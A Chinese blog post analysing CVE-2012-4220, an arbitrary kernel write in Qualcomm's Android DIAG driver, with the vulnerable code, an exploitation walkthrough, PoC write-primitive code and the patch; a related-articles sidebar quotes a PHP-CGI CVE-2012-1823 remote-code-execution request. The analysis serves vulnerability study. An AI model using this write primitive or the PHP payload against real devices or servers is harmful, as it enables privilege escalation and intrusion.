浅析CVE-2012-4220

最新推荐文章于 2024-04-28 12:29:01 发布
最新推荐文章于 2024-04-28 12:29:01 发布
阅读量1.1k 收藏
点赞数
分类专栏: Android安全-Root漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/py_panyu/article/details/45114797
版权

 

 

 

0x0 漏洞信息

 

 

https://www.codeaurora.org/projects/security-advisories/multiple-issues-diagkgsl-system-call-handling-cve-2012-4220-cve-2012

 

 

0x1 漏洞描述

 

 

Android 2.3-4.2使用的Qualcomm Innovation Center (QuIC) Diagnostics内核模式驱动程序diagchar_core.c在实现上存在整数溢出漏洞,通过向diagchar_ioctl内传递特制的输入,远程攻击者可利用此漏洞执行任意代码或造成拒绝服务.

 

 

0x2 代码分析

 

struct diagpkt_delay_params
{
  void *rsp_ptr;
  int size;
  int *num_bytes_ptr;
};

else if (iocmd == DIAG_IOCTL_GET_DELAYED_RSP_ID) 
{
  struct diagpkt_delay_params *delay_params =(struct diagpkt_delay_params *) ioarg;

  if ( (delay_params->rsp_ptr) 
  	 &&(delay_params->size == sizeof(delayed_rsp_id)) 
  	 &&(delay_params->num_bytes_ptr) ) 
  {
    *((uint16_t *)delay_params->rsp_ptr) = DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id);
    *(delay_params->num_bytes_ptr) = sizeof(delayed_rsp_id);
    success = 0;
  }
}

 

以上代码有两个问题:
(1).DIAG在处理DIAG_IOCTL_GET_DELAYED_RSP_ID这个ioctl code的时候没有做任何校验就直接使用了,传递一个无效的指针就可以造成拒绝服务
(2).delay_params中的rsp_ptr和num_bytes_ptr仅做了非空的判断就拿来使用,如果传入了无效的指针或者地址就可以造成拒绝服务或任意地址写入的漏洞.

 

 

0x3 如何利用

 

//宏定义如下
static uint16_t delayed_rsp_id = 1;
#define DIAGPKT_MAX_DELAYED_RSP 0xFFFF
#define DIAGPKT_NEXT_DELAYED_RSP_ID(x)         \
((x < DIAGPKT_MAX_DELAYED_RSP) ? x++ : DIAGPKT_MAX_DELAYED_RSP)

 

DIAGPKT_NEXT_DELAYED_RSP_ID这个宏每调用一次,delayed_rsp_id的值都会+1,直到0xFFFF最大值.

*((uint16_t *)delay_params->rsp_ptr) = DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id);
这个漏洞就是要将delay_params->rsp_ptr设置成想写入的地址,而delay_params->rsp_ptr 是被当作一个16位的指针处理,得到的是delayed_rsp_id的值,它的取值范围是0x2 - 0xFFFF.如果想要往指定的地址写入指定的值,需要先获取当前delayed_rsp_id的值,然后再用目标值减去当前值,得到循环的次数.如果delayed_rsp_id的值比我们需要的值大,那么就通过delay_params->num_bytes_ptr重置它为2.

 

 

0x4 Poc

 

 

static bool inject_value(struct diag_values *data,int fd, void *delayed_rsp_id_address)
{
  uint16_t delayed_rsp_id_value = 0;
  int i, loop_count, ret;
 
  //获取当前delayed_rsp_id的值
  ret = get_current_delayed_rsp_id(fd);

  if (ret < 0) 
  {
    return false;
  }

  delayed_rsp_id_value = ret;
  data->original_value = delayed_rsp_id_value;
 
  //如果delayed_rsp_id的值比我们需要的值大,那么就重置为2
  if (delayed_rsp_id_value > data->value 
    &&reset_delayed_rsp_id(fd, delayed_rsp_id_address) < 0) 
  {
    return false;
  }
  
  //得到循环的次数,并且 &0xffff ,将除低16位的值全部置0
  loop_count = (data->value - delayed_rsp_id_value) & 0xffff;
 
  for (i = 0; i < loop_count; i++) 
  {
    int unused;
    if (send_delay_params(fd, (void *)data->address, &unused) < 0) 
    {
      return false;
    }
  }
  return true;
}

代码中有个小问题,当delayed_rsp_id_value > data->value时,会重置delayed_rsp_id为2,但是delayed_rsp_id_value的值没有被重置,所以有可能会导致loop_count的次数不正确.所以为了准确的计算循环的次数,应该每次都将计数值重置为2.

 

 

auto ret = reset_delayed_rsp_id();
if (ret < 0) 
{
    return false;
}
 
size_t loop_count = (value - 2) & 0xffff;

 

0x5 漏洞修复

 

https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=32682d16fb46a60a7952c4d9e0653602ff674e4b

 

else if (iocmd == DIAG_IOCTL_GET_DELAYED_RSP_ID) 
{
	struct diagpkt_delay_params *delay_params =(struct diagpkt_delay_params *) ioarg;

	if ( (delay_params>rsp_ptr) 
		&&(delay_params>size == sizeof(delayed_rsp_id)) 
		&&(delay_params>num_bytes_ptr)) 
	{
		*((uint16_t *)delay_params>rsp_ptr) =DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id);
		*(delay_params>num_bytes_ptr) = sizeof(delayed_rsp_id);

		struct diagpkt_delay_params delay_params;
		uint16_t interim_rsp_id;
		int interim_size;

		//使用copy_from_user和copy_to_user来校验传入参数的正确性
		if (copy_from_user(&delay_params, (void *)ioarg,sizeof(struct diagpkt_delay_params)))
			return EFAULT;
		if ( (delay_params.rsp_ptr) 
			&&(delay_params.size == sizeof(delayed_rsp_id)) 
			&&(delay_params.num_bytes_ptr)) 
		{
			interim_rsp_id = DIAGPKT_NEXT_DELAYED_RSP_ID(delayed_rsp_id);
			if (copy_to_user((void *)delay_params.rsp_ptr,&interim_rsp_id, sizeof(uint16_t)))
				return EFAULT;
			interim_size = sizeof(delayed_rsp_id);
			if (copy_to_user((void *)delay_params.num_bytes_ptr,&interim_size, sizeof(int)))
				return EFAULT;
			success = 0;
		}
	}
}

 


参考文章:
http://blog.csdn.net/hu3167343/article/details/36180761
http://thecjw.0ginr.com/blog/archives/372

 

 

 

 

 

 

 

 

少仲_
关注
专栏目录
CVE-2012-1823漏洞复现
qq_46804551的博客
05-27 598
前言 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。 复现 在相应的漏洞环
浅析CVE-2012-0056
少仲
04-23 1603
/* author:少仲 blog: http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 漏洞信息 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0056 0x1 漏洞描
Android exploit with a Qualcomm processor (CVE-2012-4220)
莫灰灰的专栏
07-01 2732
/* 本文章由 莫灰灰 编写,转载请注明出处。   作者:莫灰灰    邮箱: minzhenfei@163.com */ 1. 漏洞描述 在处理DIAG设备的ioctl系统调用参数时,一些未经验证的引用自用户层的不可信指针被使用了。对于本地安装的应用程序来说,可以使用这个漏洞来实施拒绝服务攻击,或者在内核下执行任意代码。 2. 漏洞分析 } else if
PHP-CGI远程代码执行漏洞 CVE-2012-1823 漏洞复现
ADummy的博客
02-25 968
PHP-CGI远程代码执行漏洞(CVE-2012-1823) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ 首先,介绍一下PHP的运行模式。 下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm,他的作用就是接受Web容器通过fastcgi协议封装好的
phpcgi 代码执行 (CVE-2012-1823) 复现
m0_49936858的博客
08-22 587
CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。
cve-2012-1823漏洞复现
最新发布
m0_74402888的博客
04-28 703
CVE-2012-1823就是存在于以cgi模式运行的php中, 本质是用户请求的参数被作为了php-cgi的参数。cgi:它是一种协议。通过cgi协议,web server可以将动态请求和相关参数发送给专门处理动态内容的应用程序。
CVE-2021-3177浅析
weixin_42421477的博客
10-05 1630
CVE-2021-3177浅析CVE-2021-3177漏洞成因PoC环境准备浮点数覆盖返回地址方法运行 这篇文档作为对CVE-2021-3177的学习记录。 CVE-2021-3177 CVE-2021-3177发布日期为2021年02月19日,内容为python的函数库_ctypes/callproc.c中存在缓冲区溢出问题,具体的函数为ctypes.c_double.from_param。最为简单的PoC如下: >>> from ctypes import * >>&gt
浅析CVE-2009-2692
少仲
04-23 1802
/* author:少仲 blog: http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 漏洞信息 http://cve.scap.org.cn/cve_detail.php?id=CVE-2009-2692 0x1 漏洞描述 Linux
浅析CVE-2014-0196
少仲
05-07 1805
/* author:少仲 blog: http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 漏洞信息 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0196 0x1 漏洞描
浅析CVE-2015-3636
少仲
08-09 5843
/* author:少仲 blog:http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 漏洞信息 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3636
CVE-2012-1823复现
hhiollk的博客
03-31 1072
PHP-CGI远程代码执行漏洞 这个古老的漏洞,其实就是用户请求的querystring被作为了php-cgi的参数,命令行参数不仅可以通过 #!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12php < 5.4.2mod方式...
CVE-2012-1823学习
公众号shadow sock7
03-27 1334
参考: https://pentesterlab.com/exercises/cve-2012-1823/courseuser@debian:~$ php-cgi -h Usage: php [-q] [-h] [-s] [-v] [-i] [-f ] php [args...] -a Run interactively -b | Bind Pa
CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战
Yatere的天平秤
05-07 2177
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。  另外关于RC
Palo Alto防火墙远程代码执行漏洞复现
Just Do It
12-26 3894
最近,花了点时间复现了一下这个漏洞,踩过一些坑,在这里记录一下。关于这个漏洞的情况,可以看这里。       文章介绍说,三个漏洞组合完成代码执行的过程。作者其实写的蛮清楚的,但是在第三步是有一些坑要踩的。       首先,来复现部分权限绕过,先访问/php/utils/debug.php。会直接跳转到登录页面,如下图所示:       接着按照作者指导的方式,访问/esp/cms_c
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
orchid_sea的博客
07-19 2688
在启动docker容器时,提示ServerName错误。将配置文件从容器中复制出来修改,再复制回去。将ServerName位置添加所需IP。检查一下是否修改成功。
PHP imap 远程命令执行漏洞(CVE-2018-19518)
黑白的博客
12-30 987
声明 好好学习,天天向上 漏洞描述 University of Washington IMAP Toolkit 2007f是美国华盛顿大学(University of Washington)的一款IMAP(Internet消息访问协议)工具包。 基于UNIX平台的University of Washington IMAP Toolkit 2007f中的‘imap_open()’函数存在操作系统命令注入漏洞,该漏洞源于程序没有正确的验证server URI。远程攻击者可借助‘imap_rimap’和‘tcp_
CVE-2012-1823
qq_53063436的博客
01-05 2157
CVE-2012-1823详细介绍 漏洞复现(靶场为ctfshow) 利用 http://url/index.php?-s 判断是否存在漏洞 若出现源码组存在 bp抓包按下面修改 POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: example.com Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (co
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 1044
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
cve-2012-1675
01-31
cve-2012-1675是指微软在2012年发现的一个针对Windows操作系统的安全漏洞。这个漏洞涉及到Windows Common Control库中的一个错误,可以被远程攻击者利用来执行恶意代码。具体来说,当用户访问一个包含恶意制作的缩略图的文件夹时,攻击者可以利用这个漏洞实现远程代码执行,从而获取系统的控制权。微软在发现这个漏洞后立即发布了安全更新,提醒用户及时安装以保护系统安全。 CVE-2012-1675暴露了系统在处理特定文件格式时的弱点,攻击者可以通过制作恶意文件来利用这个漏洞进行攻击。在计算机安全方面,这种远程代码执行漏洞通常被认为是十分严重和危险的,因为攻击者可以利用它来完全控制受影响的系统,甚至可能导致系统崩溃或数据泄露。因此,及时更新系统补丁是防范这类漏洞的有效方法。 总之,CVE-2012-1675是一次涉及Windows操作系统安全的重要漏洞事件,微软发布了相应的安全补丁来修复这个问题。用户在受影响的系统上安装了这个补丁后,就可以防止攻击者利用这个漏洞对系统进行恶意攻击。同时,这也提醒用户在日常使用计算机时要保持系统及时更新,以防范类似的安全威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值